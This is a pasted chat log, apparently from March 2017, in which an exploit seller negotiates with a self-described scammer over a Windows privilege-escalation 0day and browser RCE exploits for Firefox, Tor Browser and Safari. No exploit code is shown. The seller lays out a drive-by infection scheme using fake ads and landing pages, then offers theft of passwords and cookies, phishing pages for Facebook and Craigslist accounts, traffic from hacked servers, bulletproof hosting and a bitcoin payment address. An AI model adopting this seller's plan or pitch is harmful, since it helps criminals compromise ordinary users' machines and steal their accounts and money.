· 9 years ago · Mar 20, 2017, 12:02 AM
1(20:00:30) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru has not been authenticated yet. You should authenticate (http://otr-help.cypherpunks.ca/authenticate.php?lang=en) this buddy.
2(20:00:30) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru/9980937432221576849 started.
3(20:00:44) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: hello
4(20:01:22) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: i saw your # Windows 10 - Local Privilege Escalation 0day
5(20:03:17) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: u there?
6(20:08:11) kernel12345: yes
7(20:08:12) kernel12345: hello
8(20:09:12) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: what is the price for this
9(20:09:13) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: ?
10(20:09:59) kernel12345: 14000$ BTC
11(20:10:42) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: ok but i really don't know how to work with this
12(20:10:57) kernel12345: you have ability to verify ?
13(20:11:09) kernel12345: you are okay with the price ?
14(20:11:24) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: ok with the price but i never worked with something
15(20:11:29) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: like that
16(20:11:37) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: i think i will need a lot of help
17(20:11:38) kernel12345: explain more ?
18(20:11:54) kernel12345: help with what
19(20:12:01) kernel12345: you never worked with LPE exploits ?
20(20:12:09) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: yep
21(20:12:09) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: never
22(20:12:11) googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru: :d
23(20:13:01) kernel12345: ok
24(20:13:10) kernel12345: I can provide long term support for you
25(20:13:14) kernel12345: for your specific needs
26(20:16:04) GOOGLE#ME@jabber.ru: that's ok but i hard with trust here:D...
27(20:16:15) GOOGLE#ME@jabber.ru: because the payment will need in advance and
28(20:16:25) GOOGLE#ME@jabber.ru: not many ppl send 14k in advance
29(20:16:41) kernel12345: I know
30(20:17:02) kernel12345: how much is your payment in advance ?
31(20:17:18) kernel12345: we can make it 50% first and 50% after I send you exploit src ?
32(20:17:49) GOOGLE#ME@jabber.ru: don't know now because i have not worked before
33(20:18:05) GOOGLE#ME@jabber.ru: i think i will need to learn first
34(20:18:06) GOOGLE#ME@jabber.ru: then we will see..
35(20:18:13) kernel12345: why you wanna buy this LPE ?
36(20:18:32) kernel12345: if you are buying for specific needs tell me and I can help with support
37(20:19:09) GOOGLE#ME@jabber.ru: don't have specific needs right now.. just waiting to make some money with this lpe
38(20:19:31) kernel12345: ok
39(20:19:41) kernel12345: so from where we start the deal ?
40(20:19:43) GOOGLE#ME@jabber.ru: i understand i can catch everything is going trough tor?
41(20:20:34) kernel12345: tor network ?
42(20:20:43) kernel12345: I think you got the wrong exploit idea
43(20:21:09) GOOGLE#ME@jabber.ru: then what i can do with this?
44(20:21:12) kernel12345: windows LPE is for privelege escalation on any windows machine and the tor browser RCE is for remote code execution on the Tor browser software
45(20:26:03) GOOGLE#ME@jabber.ru: and how this will help me?
46(20:26:06) GOOGLE#ME@jabber.ru: what i can do?
47(20:26:22) GOOGLE#ME@jabber.ru: so i can make some money if i buy i
48(20:26:23) GOOGLE#ME@jabber.ru: it
49(20:26:27) kernel12345: you can execute commands on the victim browser and have full permissions on the windows machine
50(20:26:30) kernel12345: yes
51(20:26:42) kernel12345: you can add to your exploit pack
52(20:27:18) GOOGLE#ME@jabber.ru: and how i infect the victim
53(20:27:18) GOOGLE#ME@jabber.ru: ?
54(20:27:36) GOOGLE#ME@jabber.ru: can i do trough PDF?
55(20:27:38) GOOGLE#ME@jabber.ru: document
56(20:27:40) kernel12345: you don't have landing pages ?
57(20:27:46) kernel12345: no need to download files
58(20:27:53) kernel12345: I can code a landing page for you
59(20:28:17) kernel12345: cross exploit the browser while the victim browse into the attacker site where you have the landing page hosted at
60(20:28:28) kernel12345: you are begginer to this or what ?
61(20:30:15) GOOGLE#ME@jabber.ru: yes.. something like that
62(20:30:25) kernel12345: ok
63(20:30:46) kernel12345: are going to add this exploit to your botnet or exploit kit or collecting them for research
64(20:31:14) kernel12345: if for adding to your botnet or exploit kit I can help you with infection pages and coding server side scripts
65(20:32:56) GOOGLE#ME@jabber.ru: i don t have botnet too
66(20:33:11) kernel12345: look
67(20:33:13) kernel12345: tell me
68(20:33:22) kernel12345: what is your target ?
69(20:33:27) kernel12345: normal user or company or who
70(20:34:50) GOOGLE#ME@jabber.ru: bro really i'm new on this king of exploits
71(20:35:01) GOOGLE#ME@jabber.ru: i think normal users.. for now
72(20:35:32) kernel12345: how much is your budget for this exploits ?
73(20:35:46) GOOGLE#ME@jabber.ru: the budget dosen't matter because i will pay
74(20:35:51) GOOGLE#ME@jabber.ru: if it's good work..
75(20:35:56) kernel12345: ok
76(20:35:58) GOOGLE#ME@jabber.ru: i just need to make some money
77(20:36:01) kernel12345: let me write you the senario
78(20:36:04) GOOGLE#ME@jabber.ru: because i really need for that
79(20:36:06) GOOGLE#ME@jabber.ru: i want to invest
80(20:36:11) GOOGLE#ME@jabber.ru: ok
81(20:36:15) kernel12345: 1 moment please
82(20:41:47) kernel12345: back
83(20:42:32) GOOGLE#ME@jabber.ru: ok
84(20:42:38) GOOGLE#ME@jabber.ru: write me that senario
85(20:45:43) kernel12345: senario with be 2 exploits .. first will be on tor browser wich allow us remote code execution to run any commands on the browser .. an lading page will have the exploit for tor .. when a victim visit the lading page a a staright HTML redirection will infect the browse file context wich allow us to get RCE and tun whatever we want and control the browser .. from here we can drop the LPE exploit and get full permissions on the victim machine
86(20:46:15) kernel12345: RCE allow us everything from stealing browser history/cache/saved passwords/ visted URLs into opening new tabs
87(20:46:53) kernel12345: the LPE allow us to get full permissions with the signed shellcodes inside the exploit you can steal files from victim desktop /hardrive with specific payloads.
88(20:47:14) kernel12345: Full controll of any machine just by this 2 exploits
89(20:49:49) kernel12345: looks good ?
90(20:49:58) kernel12345: couple of JS/PHP scripts will handle the work
91(20:49:59) GOOGLE#ME@jabber.ru: looks good
92(20:50:25) GOOGLE#ME@jabber.ru: i will need to think about this because i'm new and i know will be little hard for me to start
93(20:50:46) GOOGLE#ME@jabber.ru: right now my level is usa scams..
94(20:50:59) kernel12345: I will be back in 30 minutes
95(20:51:05) GOOGLE#ME@jabber.ru: post on the website or apps like offer up facebook etc
96(20:51:06) GOOGLE#ME@jabber.ru: k
97(21:02:59) kernel12345: back
98(21:03:00) kernel12345: yeah
99(21:03:20) kernel12345: a simple landing page could be a fake application or fake add .. the victim only needs to visit
100(21:03:30) kernel12345: no clicks no downloads
101(21:03:34) kernel12345: so what do you think ?
102(21:06:02) GOOGLE#ME@jabber.ru: i think is great
103(21:06:10) kernel12345: price
104(21:06:13) kernel12345: of budget
105(21:06:14) GOOGLE#ME@jabber.ru: how many ppl do you think i can infect per day
106(21:06:18) GOOGLE#ME@jabber.ru: ?
107(21:06:20) kernel12345: a lot
108(21:06:37) kernel12345: I can setup a onion site for you
109(21:06:41) kernel12345: but that will add some cost
110(21:09:22) GOOGLE#ME@jabber.ru: do you think can have a trick or make one so i can post on craigslist.org cars section or offerup aplication
111(21:09:35) kernel12345: yes
112(21:09:36) GOOGLE#ME@jabber.ru: or i can get facebook account from people like spam
113(21:09:41) GOOGLE#ME@jabber.ru: this is another subject
114(21:09:46) kernel12345: but if you wanna infect normal users don't buy the tor browser
115(21:09:50) kernel12345: is expensive
116(21:09:53) kernel12345: buy only firefox
117(21:10:07) kernel12345: tor browser is for the people who visit darknet and onion sites only
118(21:10:08) kernel12345: yeah
119(21:10:09) kernel12345: you can
120(21:10:32) kernel12345: if you have more budget we can buy an ad service and host a landing page for javascript payload
121(21:11:05) GOOGLE#ME@jabber.ru: so if i buy only firefox for example
122(21:11:11) GOOGLE#ME@jabber.ru: what i can do with him
123(21:11:20) kernel12345: same senario I wrote you
124(21:11:22) kernel12345: already
125(21:11:53) kernel12345: tor browser exploit + firefox rce are the same exploits
126
127(21:11:53) GOOGLE#ME@jabber.ru: don t know from where to start because..
128(21:12:05) GOOGLE#ME@jabber.ru: it's ok with firefox if i can get craigslist and facebook
129(21:12:06) GOOGLE#ME@jabber.ru: acounts
130(21:12:13) GOOGLE#ME@jabber.ru: i mean for me it's ok
131(21:13:19) GOOGLE#ME@jabber.ru: waht's the price for firefox?
132(21:14:33) GOOGLE#ME@jabber.ru: or other question what i can do to target only facebook, craigslist and offerup
133(21:14:34) GOOGLE#ME@jabber.ru: accounts
134(21:15:09) kernel12345: 9000$ for firefox exploit and 14000$ for windows LPE
135(21:15:22) kernel12345: we can steal browser cache
136(21:15:24) kernel12345: saved password
137(21:16:16) kernel12345: if you wanna target people facebook accounts or any site and steal login .. I can create a server side code for phishing pages .. when victim tries to browse into real site . a fake page will pop up and he enter his login creds into our page
138(21:16:28) kernel12345: I have 1 exploit on safari if you want and can get it working on firefox also
139(21:16:30) kernel12345: let me show you
140(21:17:02) GOOGLE#ME@jabber.ru: ok
141(21:18:58) GOOGLE#ME@jabber.ru: and how many facebook account or craigslist do you think i can get per day with this
142(21:20:53) kernel12345: thousands
143(21:20:55) kernel12345: 1 moment
144(21:20:59) kernel12345: making screenshot for this
145(21:21:03) kernel12345: what I want to show you
146(21:21:05) kernel12345: wait please
147(21:21:10) GOOGLE#ME@jabber.ru: k
148(21:25:54) kernel12345: here
149(21:25:56) kernel12345: check
150(21:26:00) kernel12345: http://prntscr.com/ej5una
151(21:26:02) kernel12345: sorry
152(21:26:07) kernel12345: I have problems with my laptop
153(21:26:13) kernel12345: to many VMs and script coding
154(21:26:28) GOOGLE#ME@jabber.ru: np
155(21:26:38) kernel12345: check screenshot
156(21:27:57) GOOGLE#ME@jabber.ru: that's good and we can steel chache cookie etc. because for example facebook have to many verification if not reconize the browser or device
157(21:28:01) GOOGLE#ME@jabber.ru: to log in
158(21:28:08) kernel12345: I can give you the safari exploit for free if you buy windows LPE + firefox RCE from me ..
159also can recode shellcodes for you on firefox to force users to visit fake pages and enter their passwords .. you will get thousands of passwords every days depends on budget you are paying to the hosting company who will host your add
160(21:28:15) kernel12345: Yes
161(21:28:20) kernel12345: now you understand
162(21:28:24) kernel12345: so
163(21:28:29) kernel12345: what exploits you wanna buy ?
164(21:28:45) kernel12345: for coding other scripts for you I give you 50% discounts for coding
165(21:30:32) GOOGLE#ME@jabber.ru: what's the hosting company and how i will pay them
166(21:30:38) GOOGLE#ME@jabber.ru: or i will need to find a good host?
167(21:30:57) kernel12345: good hosting .. where you can host your exploits
168(21:31:27) GOOGLE#ME@jabber.ru: understand so i will have to find
169(21:31:29) GOOGLE#ME@jabber.ru: np
170(21:31:31) kernel12345: hosting company for hosting the fake ad .. ad will have the javascript exploit we are using to infect users
171(21:31:52) kernel12345: I can host the exploits for you
172(21:31:57) kernel12345: but you neeed a domain name for the ad
173(21:32:03) kernel12345: a domain name that looks trusted
174(21:32:10) GOOGLE#ME@jabber.ru: that's no problem
175(21:32:14) kernel12345: ok
176(21:32:17) kernel12345: so
177(21:32:20) GOOGLE#ME@jabber.ru: and the domain will go to forgery easy
178(21:32:20) GOOGLE#ME@jabber.ru: ?
179(21:32:32) kernel12345: forgevry ?
180(21:32:36) kernel12345: what is that
181(21:32:51) GOOGLE#ME@jabber.ru: read screen
182(21:32:54) GOOGLE#ME@jabber.ru: with stop
183(21:32:57) GOOGLE#ME@jabber.ru: suspicious website
184(21:32:58) GOOGLE#ME@jabber.ru: etc
185(21:33:02) kernel12345: no
186(21:33:05) kernel12345: don't worry
187(21:33:06) GOOGLE#ME@jabber.ru: you know what i mean
188(21:33:13) kernel12345: I can give you ssl certificate
189(21:33:26) kernel12345: I have many of them from trusted webcompanies
190(21:33:40) kernel12345: lets focus on the exploits first and then move into setting up the exploits + hosting + server
191(21:33:54) kernel12345: bitcoin payment is accepted for buying my exploits ?
192(21:34:06) GOOGLE#ME@jabber.ru: i only deal with bitcoin
193(21:34:07) GOOGLE#ME@jabber.ru: :)
194(21:34:33) GOOGLE#ME@jabber.ru: bro is very tempting but i'm new to this and i don't know if really will earn from this
195(21:34:39) GOOGLE#ME@jabber.ru: u understand what i mean
196(21:35:05) kernel12345: yes I fully understand
197(21:35:06) GOOGLE#ME@jabber.ru: i'm thinking to buy something from you for a low price first this so i can get a little experience and then..
198(21:35:11) GOOGLE#ME@jabber.ru: like safari
199(21:35:16) GOOGLE#ME@jabber.ru: only if you have a good price
200(21:35:17) kernel12345: you are single buyer ?
201(21:35:25) GOOGLE#ME@jabber.ru: yes
202(21:35:25) GOOGLE#ME@jabber.ru: single
203(21:35:27) kernel12345: we can work on this both of
204(21:35:32) kernel12345: me and you and I can give you discounts
205(21:35:40) kernel12345: safari exploit is small price
206(21:35:43) kernel12345: is for 4000$
207(21:36:31) GOOGLE#ME@jabber.ru: ok let's tell i get safari for 4k
208(21:36:38) GOOGLE#ME@jabber.ru: what other costs will be to have
209(21:36:43) GOOGLE#ME@jabber.ru: everything ready and get what i need
210(21:36:50) GOOGLE#ME@jabber.ru: ?
211(21:36:56) kernel12345: ok
212(21:37:07) kernel12345: you are okay with 4000$ for safari ?
213(21:37:50) GOOGLE#ME@jabber.ru: yes i 'm ok in this moment
214(21:37:59) GOOGLE#ME@jabber.ru: all i hope is i can make my work with him
215(21:38:02) GOOGLE#ME@jabber.ru: and get what i need
216(21:38:07) kernel12345: don't worry man
217(21:38:10) kernel12345: I got your back on this
218(21:38:15) kernel12345: we both gonna make money of it
219(21:38:42) GOOGLE#ME@jabber.ru: beside 4k what other costs will be
220(21:38:44) GOOGLE#ME@jabber.ru: ?
221(21:38:49) GOOGLE#ME@jabber.ru: to get everything ready
222(21:40:02) kernel12345: 8000$ for firefox and 14000$ for win LPE
223I can give you firefox for 6000$ only I dropped 2k
224and windows LPE for 13000$ I dropped 1k
225payloads will cost around 500$
226and landing pages and server settings + server sides code are for free
227(21:40:35) kernel12345: 19500$ for all .. if you buy safari exploit right now I can make it 17000$ for all
228(21:40:47) kernel12345: each week pay by part
229(21:42:00) GOOGLE#ME@jabber.ru: and if for start with you i buy only the safari? because i'm new see how is working if it's good work don't worry i'm serious
230(21:42:17) GOOGLE#ME@jabber.ru: i will get experience and i will buy them all i think, just need to get results
231(21:42:24) GOOGLE#ME@jabber.ru: hope you understand me
232(21:42:33) kernel12345: yes I fully understand
233(21:42:39) kernel12345: is okay from my side :)
234(21:42:59) GOOGLE#ME@jabber.ru: and what you mean
235(21:43:04) GOOGLE#ME@jabber.ru: each week pay by part " ?
236(21:43:17) kernel12345: pay every week if you don't have money for all of exploits
237(21:43:20) kernel12345: or buy safari right now
238(21:43:30) kernel12345: and others when earn something
239(21:43:41) kernel12345: then we can work and share 50% earnings ?
240(21:44:27) GOOGLE#ME@jabber.ru: bulletproof we can find?
241(21:44:31) GOOGLE#ME@jabber.ru: for what price?
242(21:44:40) kernel12345: bulletproof hosting ?
243(21:44:43) GOOGLE#ME@jabber.ru: yes
244(21:45:02) kernel12345: I can get access to VPS with 10GB RAM 500GB space for 200$per month
245(21:45:07) kernel12345: from a friend in IRAN
246(21:45:40) GOOGLE#ME@jabber.ru: ok
247(21:45:48) kernel12345: ready to buy safari exploit ?
248(21:45:54) GOOGLE#ME@jabber.ru: return to safari
249(21:45:54) kernel12345: so we can start right now
250(21:45:58) kernel12345: yeah ?
251(21:46:03) GOOGLE#ME@jabber.ru: let's understand
252(21:46:04) GOOGLE#ME@jabber.ru: mean
253(21:46:07) GOOGLE#ME@jabber.ru: so i can understand
254(21:46:11) kernel12345: yeah ?
255(21:46:24) GOOGLE#ME@jabber.ru: i get facebook account with cache cookie.. etc
256(21:46:29) GOOGLE#ME@jabber.ru: so i don't have problems to login
257(21:46:31) GOOGLE#ME@jabber.ru: on them?
258(21:47:28) kernel12345: yeah
259(21:47:35) kernel12345: no problem
260(21:48:04) kernel12345: the login form will show what ip user used to login . user.password,browser versions/headers
261(21:49:55) GOOGLE#ME@jabber.ru: ok i decided to buy safari
262(21:50:02) kernel12345: ok
263(21:50:02) GOOGLE#ME@jabber.ru: but can you do me a sample before
264(21:50:03) GOOGLE#ME@jabber.ru: please
265(21:50:09) kernel12345: sample
266(21:50:10) kernel12345: ?
267(21:50:19) GOOGLE#ME@jabber.ru: proof
268(21:50:19) GOOGLE#ME@jabber.ru: test
269(21:50:24) GOOGLE#ME@jabber.ru: like a test
270(21:50:28) kernel12345: bro we been talking for the last 2 hours and you didn't show any proof of payment or buying
271(21:50:32) GOOGLE#ME@jabber.ru: to see what i'm buying don t know
272(21:50:39) GOOGLE#ME@jabber.ru: :)
273(21:50:43) GOOGLE#ME@jabber.ru: yes i know..
274(21:50:46) kernel12345: I showed you on screenshot
275(21:50:47) GOOGLE#ME@jabber.ru: i already stress u
276(21:50:50) kernel12345: is a URL spoofing
277(21:50:51) kernel12345: eyah
278(21:50:51) GOOGLE#ME@jabber.ru: but hope u understand
279(21:50:51) GOOGLE#ME@jabber.ru: me
280(21:50:52) kernel12345: yeah
281(21:50:58) kernel12345: im tired of typing
282(21:51:03) kernel12345: im waiting for the payment moment
283(21:51:10) kernel12345: and you keep asking
284(21:51:18) kernel12345: and I asnwer
285(21:51:21) GOOGLE#ME@jabber.ru: i told you i'm new... and
286(21:51:23) GOOGLE#ME@jabber.ru: so many questions
287(21:51:26) GOOGLE#ME@jabber.ru: fuck..
288(21:51:31) kernel12345: I answer all right ?
289(21:51:35) GOOGLE#ME@jabber.ru: yes
290(21:51:37) GOOGLE#ME@jabber.ru: correct
291(21:51:38) kernel12345: is payment moment bro
292(21:51:45) kernel12345: you have the bitcoin ready ?
293(21:52:06) kernel12345: where do you want me to send you the exploit code ? upload on private site or send via email
294(21:52:17) GOOGLE#ME@jabber.ru: i have payment but don't know... i think i need a test to see how is working
295(21:52:19) GOOGLE#ME@jabber.ru: or soemthing like that
296(21:52:29) kernel12345: what proof you need
297(21:52:30) kernel12345: ?
298(21:52:51) GOOGLE#ME@jabber.ru: i think you not understand correct.. not proof
299(21:52:57) GOOGLE#ME@jabber.ru: i trust you that have this exploit
300(21:53:04) kernel12345: and what do you need >
301(21:53:05) GOOGLE#ME@jabber.ru: i mean a test to see how is working
302(21:53:13) GOOGLE#ME@jabber.ru: don t know how to telll
303(21:53:18) kernel12345: look man
304(21:54:02) GOOGLE#ME@jabber.ru: ?
305(21:54:30) kernel12345: you have btc ready
306(21:54:34) kernel12345: I give you my wallet
307(21:54:39) kernel12345: you make payment and I send you exploit
308(21:54:42) kernel12345: right now
309(21:56:01) kernel12345: after payment you can setup on your site and test
310(21:56:13) kernel12345: if you need host I can get small host for you for free
311(21:56:40) GOOGLE#ME@jabber.ru: look what i don't understand...
312(21:56:51) GOOGLE#ME@jabber.ru: for example i setup an website
313(21:56:55) GOOGLE#ME@jabber.ru: everything ready
314(21:56:56) kernel12345: yes
315(21:57:00) GOOGLE#ME@jabber.ru: how people will get on my website
316(21:57:01) GOOGLE#ME@jabber.ru: ?
317(21:57:11) kernel12345: you only need to upload the exploit source on your www directory
318(21:57:19) kernel12345: depends on where you are uploading
319(21:57:31) kernel12345: where do you wanna upload ?
320(21:57:46) GOOGLE#ME@jabber.ru: i will buy a domain and host with bitcoin
321(21:57:49) GOOGLE#ME@jabber.ru: for example
322(21:57:51) kernel12345: you want big traffic? I can redirect some users from a hacked server
323(21:57:54) kernel12345: yes
324(21:59:25) kernel12345: you buy domain and host and upload the exploit source code
325(21:59:36) kernel12345: and send site link to people
326(21:59:37) kernel12345: that's all
327(21:59:39) kernel12345: easy setup
328(21:59:52) kernel12345: if you want the hard setup it will be buying large traffic from hacked servers
329(22:00:02) kernel12345: I got 2 hacked servers on europe
330(22:00:10) kernel12345: will redirect them into your site URL
331(22:00:13) kernel12345: once you buy
332(22:00:21) GOOGLE#ME@jabber.ru: i need people from usa
333(22:00:29) kernel12345: no problem
334(22:00:41) kernel12345: you need to upload exploit source first on your site
335(22:00:50) kernel12345: people traffic is not a problem
336(22:00:56) GOOGLE#ME@jabber.ru: how much will cost me the trafic?
337(22:01:00) GOOGLE#ME@jabber.ru: usa people
338(22:01:40) kernel12345: 1000 people for 50$
339(22:01:42) kernel12345: cheap
340(22:04:33) GOOGLE#ME@jabber.ru: ok so you will support me every time if i need help
341(22:04:42) GOOGLE#ME@jabber.ru: or exploit need update or something like that
342(22:05:03) kernel12345: yeah
343(22:05:08) kernel12345: that's what I was telling you
344(22:05:16) kernel12345: yes I provide long term support
345(22:05:18) kernel12345: when you buy
346(22:06:14) kernel12345: can we now start safari exploit deal ?
347
348(22:06:19) kernel12345: 4000$ btc ?
349(22:08:22) GOOGLE#ME@jabber.ru: yes it's ok can i pay you now half and as soon i'm starting getting resuls everything ok
350(22:08:23) GOOGLE#ME@jabber.ru: pay u the rest?
351(22:08:33) kernel12345: how much do you have right now ?
352(22:09:13) GOOGLE#ME@jabber.ru: i have all the payment but.. i fell more comfortable
353(22:09:14) GOOGLE#ME@jabber.ru: in this way
354(22:09:20) kernel12345: okay
355(22:09:29) kernel12345: you pay 50% right now and 50% after you start getting results
356(22:09:40) kernel12345: you promise to pay 50% when you get results ?
357(22:10:17) GOOGLE#ME@jabber.ru: i'm serious bro... looking to make money
358(22:10:22) GOOGLE#ME@jabber.ru: not to burn you.. after talk
359(22:10:23) kernel12345: ok I trust you
360(22:10:23) GOOGLE#ME@jabber.ru: a lot
361(22:10:35) kernel12345: here is my wallet
362(22:10:35) kernel12345: 1Era8uF1c9N5TjBmqXNK39SYPZQtEs4e22
363(22:13:22) GOOGLE#ME@jabber.ru: ok
364(22:13:25) GOOGLE#ME@jabber.ru: payment sent
365(22:13:26) GOOGLE#ME@jabber.ru: :D
366(22:13:39) GOOGLE#ME@jabber.ru: SENTMarch 12 @ 05:13 PM
367To:1Era8uF1c9N5TjBmqXNK39SYPZQtEs4e22From:My Bitcoin WalletAdd a descriptionpending1.6279112 BTC
368(22:13:44) GOOGLE#ME@jabber.ru: as you can see
369(22:14:00) kernel12345: done ?
370(22:14:05) GOOGLE#ME@jabber.ru: yes
371(22:14:13) GOOGLE#ME@jabber.ru: need to come soon..
372(22:14:18) GOOGLE#ME@jabber.ru: what wallet do you have
373(22:14:19) GOOGLE#ME@jabber.ru: ?
374(22:14:42) kernel12345: blockchain
375(22:14:45) kernel12345: let me check
376(22:14:48) GOOGLE#ME@jabber.ru: same here
377(22:14:48) GOOGLE#ME@jabber.ru: check
378(22:14:51) kernel12345: ok
379(22:17:29) kernel12345: nothing
380(22:17:34) kernel12345: send link to blockchain
381(22:17:55) GOOGLE#ME@jabber.ru: 1sec
382(22:18:04) kernel12345: ok
383(22:18:33) GOOGLE#ME@jabber.ru: https://blockchain.info/tx/43d3f8250e3f71007369501f4728246e8a612cdf12c008052763de1a14eafafc
384(22:19:08) kernel12345: 1 moment
385(22:19:25) kernel12345: $ 29,499.99 ??
386(22:19:28) kernel12345: what is that
387(22:19:36) kernel12345: 29k hahah ??
388(22:19:38) kernel12345: no waty
389(22:19:42) kernel12345: wrong link man
390(22:19:47) GOOGLE#ME@jabber.ru: look up
391(22:19:48) GOOGLE#ME@jabber.ru: bro
392(22:19:49) GOOGLE#ME@jabber.ru:
3931Era8uF1c9N5TjBmqXNK39SYPZQtEs4e22 (https://blockchain.info/address/1Era8uF1c9N5TjBmqXNK39SYPZQtEs4e22)Â 1.62764 BTC
394(22:19:51) GOOGLE#ME@jabber.ru: your wallet
395(22:22:46) GOOGLE#ME@jabber.ru: ?
396(22:23:32) kernel12345: no
397(22:23:38) kernel12345: nothing is showing up
398(22:23:52) GOOGLE#ME@jabber.ru: man i have sent... if you want
399(22:23:56) GOOGLE#ME@jabber.ru: i make you a print screen
400(22:24:02) kernel12345: ok
401(22:24:10) kernel12345: make screenshot of your wallet
402(22:24:18) GOOGLE#ME@jabber.ru: maybe bitcoin confirmations come hard ..
403(22:24:21) GOOGLE#ME@jabber.ru: don t know but sure will com
404(22:24:21) GOOGLE#ME@jabber.ru: e
405(22:24:39) kernel12345: resend
406(22:24:42) kernel12345: or network problem ?
407(22:24:50) kernel12345: make screenshot please
408(22:26:01) GOOGLE#ME@jabber.ru: http://i.imgur.com/8zouBPk.png
409(22:26:27) kernel12345: show me all your wallet
410(22:27:18) GOOGLE#ME@jabber.ru: why... the transactions
411(22:27:18) GOOGLE#ME@jabber.ru: is enough..
412(22:27:28) GOOGLE#ME@jabber.ru: you can see the transaction
413(22:27:39) GOOGLE#ME@jabber.ru: i sent man.. as you can see
414(22:28:45) GOOGLE#ME@jabber.ru: so what happen now
415(22:28:46) GOOGLE#ME@jabber.ru: ?
416(22:29:00) kernel12345: I see nothing man
417(22:29:02) kernel12345: resend
418(22:29:15) GOOGLE#ME@jabber.ru: lol:)
419(22:30:03) kernel12345: what
420(22:30:04) kernel12345: ???
421(22:30:08) kernel12345: I get nothing man\
422(22:30:20) GOOGLE#ME@jabber.ru: don't playing games bro...
423(22:30:25) GOOGLE#ME@jabber.ru: you have the photo proof
424(22:30:38) GOOGLE#ME@jabber.ru: is 100% sure i have sent
425(22:30:47) kernel12345: wallet transaction is showing nothing
426(22:30:54) kernel12345: I can make fake photo right now
427(22:31:00) kernel12345: inspect element !!!!
428(22:31:28) GOOGLE#ME@jabber.ru: i m not like this i sent..
429(22:31:35) GOOGLE#ME@jabber.ru: so if you not received sure will come
430(22:31:43) GOOGLE#ME@jabber.ru: there is no way to not come
431(22:32:39) kernel12345: I will wait for payment
432(22:32:44) GOOGLE#ME@jabber.ru: i check and it's Pending:0/3confirmations
433(22:32:47) kernel12345: I cannot send anything until I see cnfirmation
434(22:32:49) GOOGLE#ME@jabber.ru: so no confirmations until now
435(22:32:52) kernel12345: is 0/3
436(22:32:54) kernel12345: hah
437(22:32:54) GOOGLE#ME@jabber.ru: ok
438(22:32:54) kernel12345: ok
439(22:33:02) kernel12345: we will wait until is 3/3 okay ?
440(22:33:08) GOOGLE#ME@jabber.ru: np
441(22:33:11) kernel12345: I will have to go eat something
442(22:33:17) kernel12345: im tired from typing bro
443(22:33:23) kernel12345: been 3 hours now I type in your chat
444(22:33:26) kernel12345: my hands are tired
445(22:33:31) GOOGLE#ME@jabber.ru: same here
446(22:33:35) GOOGLE#ME@jabber.ru: :)
447(22:33:46) kernel12345: bye
448(22:33:48) Private conversation with googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru/9980937432221576849 lost.
449(22:38:47) GOOGLE#ME@jabber.ru has signed on.
450(23:01:29) GOOGLE#ME@jabber.ru has signed on.
451(23:14:01) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru/9980937432221576849 started.
452(23:14:11) GOOGLE#ME@jabber.ru: 2/3 confirmations
453(23:14:15) GOOGLE#ME@jabber.ru: now see on your account
454(23:14:15) GOOGLE#ME@jabber.ru: ?
455(23:15:06) GOOGLE#ME@jabber.ru: 3/3
456(23:15:08) GOOGLE#ME@jabber.ru: :)
457(23:15:15) GOOGLE#ME@jabber.ru: don't tell now if have not received..
458(23:25:08) GOOGLE#ME@jabber.ru is no longer away.
459(23:44:00) GOOGLE#ME@jabber.ru: :)
460(23:44:02) GOOGLE#ME@jabber.ru: no answer now
461(23:44:08) GOOGLE#ME@jabber.ru: good
462(23:44:13) GOOGLE#ME@jabber.ru: enjoy
463(2017-03-13 00:11:54) Attempting to refresh the private conversation with googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru/9980937432221576849...
464(00:11:55) Successfully refreshed the unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru/9980937432221576849.
465(00:11:57) kernel12345: hi
466(00:12:02) kernel12345: enjoy what
467(00:12:18) kernel12345: what the fuck are you in a hurry did you thought I scammed you or what ?
468(00:12:40) GOOGLE#ME@jabber.ru: yes
469(00:12:40) GOOGLE#ME@jabber.ru: :))
470(00:12:45) kernel12345: no
471(00:13:02) kernel12345: I was away eating . and familly members got together talking didn't have time to write you
472(00:13:07) kernel12345: internet slow you can't imagine
473(00:13:12) kernel12345: why you think I scammed you
474(00:13:19) kernel12345: send me your I will
475(00:13:24) kernel12345: im giving you your money
476(00:13:36) kernel12345: I don't need this type of deals that are not built on trust
477(00:14:38) GOOGLE#ME@jabber.ru: sorry but.. but are many people here.. trying to scam
478(00:14:40) GOOGLE#ME@jabber.ru: and..
479(00:15:39) kernel12345: and what ?
480(00:15:41) kernel12345: what the hell
481(00:15:49) kernel12345: why I scam you when you get rest of my money ??
482(00:16:16) GOOGLE#ME@jabber.ru: again sorry
483(00:16:16) GOOGLE#ME@jabber.ru: :)
484(00:16:26) GOOGLE#ME@jabber.ru: i will understand if you won't work with me
485(00:16:26) GOOGLE#ME@jabber.ru: anymore
486(00:16:34) kernel12345: you look childish by this axctions
487(00:16:38) kernel12345: actions
488(00:16:52) kernel12345: by doing this you show no intrests in paying me the rest of 2000$
489(00:17:11) kernel12345: because you are not patience like I was when I was talking for 3 hours
490(00:17:19) kernel12345: typing and answering you and giving full details
